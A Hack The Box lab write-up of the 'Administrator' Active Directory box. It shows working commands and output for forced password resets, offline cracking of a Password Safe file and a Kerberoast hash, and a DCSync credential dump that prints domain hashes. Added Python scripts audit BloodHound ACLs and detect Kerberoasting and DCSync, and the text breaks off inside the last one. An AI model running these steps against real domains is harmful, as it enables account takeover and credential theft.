
HTB--Administrator

Table of contents

    • Target information
    • Initial domain enumeration and credential validation
      • FTP login attempt
      • SMB enumeration attempt
      • WinRM login as olivia
      • Domain user enumeration
    • Getting michael's access
      • Extracting domain information with BloodHound
      • GenericAll
    • Getting benjamin's access
      • ForceChangePassword
      • FTP login as benjamin
    • Getting emily's access
      • pwsafe + hashcat
    • Getting ethan's access
    • Getting Administrator access

Target information

A Windows machine. Difficulty: medium

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

Username: Olivia
Password: ichliebedich

Goal: obtain one user flag and one administrator (root) flag.


Initial domain enumeration and credential validation

First, scan all ports with Nmap to determine the open services and potential entry points.

┌──(root㉿kali)-[/HTB/Administrator]
└─# nmap --min-rate 10000 -p- 10.10.11.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:38 CST
Nmap scan report for 10.10.11.42
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-13 20:17:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

FTP login attempt

Try logging in over FTP with the supplied account 'Olivia' and password 'ichliebedich'. The login fails with the error "home directory inaccessible".

┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): Olivia
331 Password required
Password: 
530 User cannot log in, home directory inaccessible.
ftp: Login failed

SMB enumeration attempt

SMB is a network file-sharing protocol that lets applications read and write files, request remote services and perform other operations over the network.

Using the supplied credentials, enumerate the SMB service with CrackMapExec to verify that the credentials work and to check for any useful shares.

CrackMapExec is a widely used penetration-testing tool for enumerating and exploiting Windows networks. It is particularly suited to large-scale scanning, authentication, command execution and share enumeration against SMB, RDP and WinRM services.

The result shows that Olivia's SMB login is valid, but no useful shares were found: only the standard NETLOGON and SYSVOL shares are readable.

┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich 
SMB         10.10.11.42     445    DC               [+] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share 

WinRM login as olivia

WinRM is Microsoft's remote management protocol. It allows remote command execution, process launching and system configuration, much like SSH on Unix systems.

Check the target's WinRM service (port 5985) with CrackMapExec: the credentials are valid and the login succeeds.

The result shows that remote access can be obtained over WinRM.

┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'     
SMB         10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP        10.10.11.42     5985   DC               [*] http://10.10.11.42:5985/wsman
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

Log in with evil-winrm to dig further into the target host's privileges and user information, and run whoami /all to list the current user's groups and privileges.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all
----------------

User Name            SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

The output shows that Olivia has only basic privileges, plus SeMachineAccountPrivilege, which allows her to add computer accounts to the domain.

Domain user enumeration

After logging in to the target, enumerate the domain's users with the net user command, which lists all user accounts on the domain controller.

*Evil-WinRM* PS C:\Users\olivia\Documents> net user

User accounts for \\
-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia

olivia is the current user; the rest are other users in the domain.


Getting michael's access

Extracting domain information with BloodHound

Use bloodhound.py to collect information from the domain.

BloodHound download: https://github.com/BloodHoundAD/BloodHound/releases

┌──(root㉿kali)-[/HTB/Administrator]
└─# python /HTB/BloodHound/bloodhound.py -d administrator.htb -ns 10.10.11.42 -u 'olivia' -p ichliebedich -c All --zip
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 30S
INFO: Compressing output into 20241205094659_bloodhound.zip

After running this command we get the archive 20241205094659_bloodhound.zip, which contains all the key information about the domain. Next, start the database with sudo neo4j start, launch the bloodhound command, and drag the zip file into BloodHound to upload it.

Our current user is olivia, so look at her node: olivia has a First Degree Object Control entry (abbreviated FDOC below). Clicking it shows that olivia has GenericAll over the user michael.


GenericAll

GenericAll is equivalent to "Full Control": olivia has complete control over the michael account, including changing its password and group memberships.

From the evil-winrm session as olivia, change the domain user michael's password to michael:

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael michael /domain
The command completed successfully.

The login succeeds; the michael account is ours.

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'michael' -p 'michael'
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

Getting benjamin's access

ForceChangePassword

Open BloodHound and look at the michael user: he also has an FDOC entry, and it grants ForceChangePassword over benjamin, i.e. michael can force a password change on benjamin.
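The GenericAll and ForceChangePassword edges above are exactly what a defender should be hunting for in the same BloodHound collection. The script below is an added example (not from the original writeup or from BloodHound itself): it walks the ACE lists in the JSON files that bloodhound.py packs into its zip, reports every non-privileged principal holding a takeover right over another object, and chains those rights into the path an attacker would follow. SAMPLE_OBJECTS, the SIDs and the allow-list are constructed to mirror this box; the field names follow the BloodHound v4 JSON layout.

```python
"""Audit BloodHound collector output for control rights held by ordinary users.

Added example, not part of the original writeup or of BloodHound. It reads the
users/groups/computers/domains JSON that bloodhound.py writes, reports dangerous
ACEs whose holder is not a privileged principal, and follows them breadth-first.
SAMPLE_OBJECTS is constructed to mirror the chain on this box.
"""
import json
import zipfile
from collections import defaultdict, deque

# RightName values that let the holder take over the target (or replicate the domain).
DANGEROUS_RIGHTS = {
    "GenericAll", "GenericWrite", "ForceChangePassword", "WriteDacl", "WriteOwner",
    "Owns", "AllExtendedRights", "GetChanges", "GetChangesAll",
}
# Expected holders: Domain Admins (-512), Enterprise Admins (-519), Domain Controllers
# (-516), built-in Administrators and LocalSystem.
PRIVILEGED_RID_SUFFIXES = ("-512", "-519", "-516")
PRIVILEGED_SIDS = {"S-1-5-32-544", "S-1-5-18"}

DOMAIN_SID = "S-1-5-21-1088858960-373806567-254189436"  # from whoami /all on this box

def sid(rid):
    return f"{DOMAIN_SID}-{rid}"

# Constructed sample: the edges BloodHound showed for olivia, michael, emily and ethan.
SAMPLE_OBJECTS = [
    {"ObjectIdentifier": sid(1108), "Properties": {"name": "OLIVIA@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": sid(1109), "Properties": {"name": "MICHAEL@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": sid(1108), "PrincipalType": "User", "RightName": "GenericAll"}]},
    {"ObjectIdentifier": sid(1110), "Properties": {"name": "BENJAMIN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": sid(1109), "PrincipalType": "User", "RightName": "ForceChangePassword"}]},
    {"ObjectIdentifier": sid(1112), "Properties": {"name": "EMILY@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": sid(1113), "Properties": {"name": "ETHAN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": sid(1112), "PrincipalType": "User", "RightName": "GenericWrite"}]},
    {"ObjectIdentifier": DOMAIN_SID, "Properties": {"name": "ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": sid(1113), "PrincipalType": "User", "RightName": "GetChanges"},
              {"PrincipalSID": sid(1113), "PrincipalType": "User", "RightName": "GetChangesAll"},
              {"PrincipalSID": sid(512), "PrincipalType": "Group", "RightName": "GenericAll"}]},
]

def is_privileged(principal_sid):
    return principal_sid in PRIVILEGED_SIDS or principal_sid.endswith(PRIVILEGED_RID_SUFFIXES)

def load_bloodhound_zip(path):
    """Read every object list out of a bloodhound.py zip (users, groups, computers, domains)."""
    objects = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if name.endswith(".json"):
                objects.extend(json.loads(zf.read(name)).get("data", []))
    return objects

def control_edges(objects):
    """Map holder name -> {(right, target name)} for dangerous ACEs held by non-privileged SIDs."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objects}
    edges = defaultdict(set)
    for obj in objects:
        for ace in obj.get("Aces", []):
            holder = ace["PrincipalSID"]
            if ace["RightName"] in DANGEROUS_RIGHTS and not is_privileged(holder):
                edges[names.get(holder, holder)].add((ace["RightName"], obj["Properties"]["name"]))
    return edges

def reachable_from(objects, start):
    """Objects a holder of `start` can take over by chaining control rights (breadth-first)."""
    edges = control_edges(objects)
    seen, queue = set(), deque([start])
    while queue:
        for _, target in edges.get(queue.popleft(), ()):
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return seen
```

Against the zip collected earlier, `reachable_from(load_bloodhound_zip("20241205094659_bloodhound.zip"), "OLIVIA@ADMINISTRATOR.HTB")` returns every object olivia can reach; on the sample it yields michael and, through him, benjamin.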


FTP login as benjamin

BloodHound shows no control rights for benjamin, but he is a member of the Share Moderators group, so an FTP login is worth trying.


Next, connect with rpcclient as michael and use setuserinfo2 to reset benjamin's password, then log in to FTP as benjamin:

┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit

┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

benjamin's access obtained.


Getting emily's access

After logging in over FTP, list the files in the current directory: there is a backup file, Backup.psafe3. Download it.

ftp> dir
ftp> binary  # switch to binary mode for the transfer
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51246|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************|   952        0.77 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.77 KiB/s)

pwsafe + hashcat

Next, open the file with pwsafe; it asks for a password.

pwsafe download: https://github.com/pwsafe/pwsafe/releases

Crack it with hashcat using mode 5200 (Password Safe v3) and the rockyou wordlist.

rockyou wordlist: https://github.com/zacheller/rockyou

┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat -m 5200 Backup.psafe3 rockyou.txt
hashcat (v6.2.6) starting                                                                                                                                                           
Dictionary cache built:
* Filename..: rockyou.txt                                                                
* Passwords.: 14344391                                                                            
* Bytes.....: 139921497                                                                             
* Keyspace..: 14344384                                                                             
* Runtime...: 1 sec           

Backup.psafe3:tekieromucho                                

The password cracks to tekieromucho. The safe holds the passwords of the users alexander, emily and emma.


emily's password is UXLCI5iETUsIBoFVTj8yQFKoHjXmb.

Log in as emily with evil-winrm:

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily

emily's access obtained. Move to the Desktop directory and grab the first flag.

*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir

    Directory: C:\Users\emily\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         12/7/2024  12:20 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
888ac3b3d60b08fa502ca90c9e90d506

Getting ethan's access

Back in BloodHound, emily has an FDOC entry granting GenericWrite over the user ethan.

In an Active Directory (AD) environment, GenericWrite is a right that lets the holder modify attributes of the target account.


A brief introduction to the Kerberoasting attack:

During authentication, the Kerberos protocol allows any domain user to request a service ticket for an account that has an SPN (Service Principal Name, the unique name identifying a service instance).

These tickets are usually encrypted with the account's NTLM hash, so as long as a domain account has an SPN registered, an attacker can request its service ticket over Kerberos and extract the ticket. By cracking the service ticket offline (for example with PowerView or GetUserSPNs.py), the attacker indirectly recovers the target account's password.

Here, however, ethan has no SPN registered, so we must use GenericWrite to create an SPN on the ethan account ourselves, then request a ticket with targetedKerberoast.py and crack it.

targetedKerberoast.py download: https://github.com/ShutdownRepo/targetedKerberoast

Sync the clock with the DC first; otherwise the time difference makes the attack fail.

┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdig 10.10.11.42 
2024-12-07 19:24:32.486796 (+0800) +57577.625273 +/- 0.706782 10.10.11.42 s1 no-leap
                                                                                   
┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdate 10.10.11.42
2024-12-07 19:24:41.787024 (+0800) +57578.378741 +/- 0.419693 10.10.11.42 s1 no-leap
CLOCK: time stepped by 57578.378741                     

Now run the attack:

┌──(root㉿kali)-[/HTB/Administrator]
└─# python targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$...

Now that we have the krb5tgs hash (saved to a file named krb5t), crack it with hashcat:

┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat krb5t rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$e52df94e29cff8fd07770680c4272fe8dca87da8fd11e36c2167e2c9abcd3b1e5e24227211f06ed8277388f30a0b935ed733f1eaf9d2fd5340e8e5b19fd51e7825d8059a6fffab4d0644edca80a778a17cf688e7077efee48fe36a0530d5e713ef48b08f2c44c2cd556614e598a575d6c303f7cb8653e6ec224e4d94eff3fa7ae48a18cc155dfbc938d6f8c33ec6a9765f1cdbacaa585b59611a54088ccec70d450cea352631f602c12cdf2626b9642145806842cd86220632bf1c0332501683640a749d5dc579d74ce433ce6440fa0ef4269d23131e0b75c25c22cc71a96bdbe972caf10d594fb8b9996eefc45dd2465fcb00c2c407aefaae2e107e4a9e3e643dd4937392ce935f8095f9f38cd7772266cad8ca827707967db5bbef143285a424965157937436208b3862e5560b2bd65a220e38c99414aa2dbee9efc0dd30863df2f239c63896a77b69b132f68416efcb7e9b384c8e8ebe9346f4a49eedec7470414459d3cdc096d4743ad4f194b30c44cd7e70aa297cfd628a3033c37725dbd9a4152fbb218b62d51a118f70eca8d893b50af2740763d0738852f9c192bc7396f653ff093256103b22874762e7d24fd5b2331e4524f32e8c1c9f00e9d88ba44017dddf86483bb076776de00d0779f5760be3979fb7af5a9807f297dcbdc2b77be04a076fb64a508b375a05b19088dad070771529fdc6b039f014214276a991eef28734b6fbc919c0972e12189487e824a35bd9e94bf6c61e7a274f1eb90569c9e2c0c7c96b5c75e9d084f8f426b9b769f5a61961a03184357309acc34f7cd8ba64c800c0303357644e6f844575cc9ed989b17cf91c1ffcc6bd0b4524927708c024868eb86cf5d9a28ca47dcbbbb2204d7836d4aee434c8e306efa14b0ce84983d489978809d3152780493b3c5ee908cf9d1d76ce7923d8c42f70c1ce78e73bfe45eb9c7a55e4906653d272720a2fcf2b92789c5a70f3306ade5a0dcedc86accf69bf25f40dc45cb70fc6f3eb166283e4380023a59639a99041803e0b9b013463b996f4c9ffc860f2498ba21bf8a4388592056b41522639c97b13c9809625bf8223c86c2e43ddd1c28d005dcdec42c5569e1a1e037a6987788c4a4cf549f66fd9a49fe1cecce548774c540e16633c7583eb26f16161900ab98c5abc652fb49a045f93a514740a3f5fc4eec9ecb59b23f6f96e96fb3b0b8a830c3746f99117b942246fcf0ddd10ef5e3472ad230f10eee854e371f6abd5e47a5d4f434b64ce3ab624e0ec2ecdd22c2e706611bc7f5a428ba5dd9d5b89c596b96436ee1a44e0f911bf923a0395d8225c59d9698fe52ac37850927d216eac82f
e88e8acb5c4cc13cf2346694407698fce8449922d6cfc02192f3b415161f51e3f43355ed9619aeeff9b790950c50b23ef35961fcc6190fad445ceb02e757d5b18ef6238f092518429e2a45c71388371d6a6079f15c5a9cbb4baa03a850e217b2ab74ed9e6f1c3589dbae62495368360099394563b0679aaf4726968be9efe2f940c530155890b:limpbizkit
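The SPN-write-then-roast sequence above leaves a distinctive trail on the DC, and this is the detection a defender would pair with it. Added example, not from the original writeup or from targetedKerberoast: it correlates Security event 5136 (a servicePrincipalName value added to a user object) with the RC4 (etype 0x17) service-ticket request in event 4769 that follows it. SAMPLE_EVENTS is constructed to mirror the emily -> ethan step; the field names follow the Windows Security log, and the 30-minute window is an assumption.

```python
"""Detect targeted Kerberoasting from Windows Security events.

Added example, not part of the original writeup or of targetedKerberoast. It correlates
event 5136 (directory object modified: a servicePrincipalName value added) with the
event 4769 (service ticket requested) that follows, flagging RC4 (etype 0x17) tickets for
user accounts. Ordinary tickets target computer/service accounts and use AES (0x11/0x12).
SAMPLE_EVENTS is constructed to mirror the emily -> ethan step on this box.
"""
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}           # RC4-HMAC and RC4-HMAC-EXP
SPN_ATTRIBUTE = "serviceprincipalname"
OP_VALUE_ADDED = "%%14674"              # 5136 OperationType: value added
OP_VALUE_DELETED = "%%14675"            # 5136 OperationType: value deleted

SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2024-12-07T11:24:50", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "svc/constructed-spn", "OperationType": OP_VALUE_ADDED},
    {"EventID": 4769, "Time": "2024-12-07T11:24:51", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    # targetedKerberoast removes the SPN again right after roasting: a second signal.
    {"EventID": 5136, "Time": "2024-12-07T11:24:52", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "svc/constructed-spn", "OperationType": OP_VALUE_DELETED},
    # Benign: a user asking for a ticket to the DC's machine account with AES.
    {"EventID": 4769, "Time": "2024-12-07T11:30:00", "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.42"},
]

def cn_of(dn):
    """'CN=ethan,CN=Users,DC=administrator,DC=htb' -> 'ethan'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def account(name):
    """'emily@ADMINISTRATOR.HTB' or 'ethan' -> bare lowercase sAMAccountName."""
    return name.split("@", 1)[0].lower()

def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Return (severity, message) alerts in time order."""
    alerts, spn_added = [], {}          # spn_added: target account -> (writer, time)
    for ev in sorted(events, key=lambda e: e["Time"]):
        ts = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 5136 and ev["AttributeLDAPDisplayName"].lower() == SPN_ATTRIBUTE:
            target, writer = cn_of(ev["ObjectDN"]), account(ev["SubjectUserName"])
            if ev["OperationType"] == OP_VALUE_ADDED:
                spn_added[target] = (writer, ts)
                alerts.append(("medium", f"{writer} added SPN {ev['AttributeValue']} to {target}"))
            elif ev["OperationType"] == OP_VALUE_DELETED and target in spn_added:
                alerts.append(("medium", f"{writer} removed the SPN from {target} again (cleanup)"))
        elif ev["EventID"] == 4769:
            service, requester = account(ev["ServiceName"]), account(ev["TargetUserName"])
            if ev["TicketEncryptionType"] not in RC4_ETYPES or service.endswith("$"):
                continue                # AES tickets and computer-account services are normal
            added = spn_added.get(service)
            if added and ts - added[1] <= window:
                delay = int((ts - added[1]).total_seconds())
                alerts.append(("high", f"{requester} requested an RC4 TGS for {service} {delay}s "
                                       f"after {added[0]} added its SPN (targeted Kerberoast)"))
            else:
                alerts.append(("low", f"{requester} requested an RC4 TGS for user account "
                                      f"{service} from {ev['IpAddress']}"))
    return alerts
```

Event 5136 only appears if the Directory Service Changes audit subcategory is enabled and a SACL covering servicePrincipalName writes exists on the user objects; the 4769 RC4 check works without either.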


Getting Administrator access

Now that we have ethan's password, check his rights in BloodHound. ethan's FDOC entries indirectly give him DCSync rights on the domain controller (DC).

DCSync is an attack technique that abuses the Active Directory (AD) replication mechanism. A user holding DCSync rights can impersonate a domain controller and ask other DCs to replicate sensitive data such as NTLM hashes and Kerberos keys.


Using DCSync, dump all of the domain controller's credentials with impacket-secretsdump:

┌──(root㉿kali)-[/HTB/Administrator]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8dc537c77bd919cc78dd0a50c96ddb84e9cd05b3dfe1746606cf781b2d2b034c
administrator.htb\michael:aes128-cts-hmac-sha1-96:5431bff0c178b1929b1d3f75df76e610
administrator.htb\michael:des-cbc-md5:2a4c9b1a6802072a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9bb89823c8c2b20787ae2a3f5078b9c1660de5df5e13fb10cfc29d2634b98676
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:bdd3ca10646fdaaa820dabcf80248d0c
administrator.htb\benjamin:des-cbc-md5:cbeabaa2dae343a2
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 
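The DRSUAPI replication that secretsdump just performed is logged by the DC as Security event 4662 on the domain naming context, carrying the DS-Replication-Get-Changes control-access GUIDs. The following is an added example (not from the original writeup or from Impacket) of the check a defender runs over those events: any subject other than a domain controller or a known replication service requesting these rights is a DCSync alert. SAMPLE_EVENTS and the allow-list are constructed to mirror ethan's run on this box; field names follow the Windows Security log.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not part of the original writeup or of Impacket. A 4662 whose Properties
field contains a DS-Replication-Get-Changes* GUID means the subject asked the DC to
replicate directory data; only DCs (and e.g. Azure AD Connect) should ever do that.
SAMPLE_EVENTS is constructed to mirror ethan's secretsdump run on this box.
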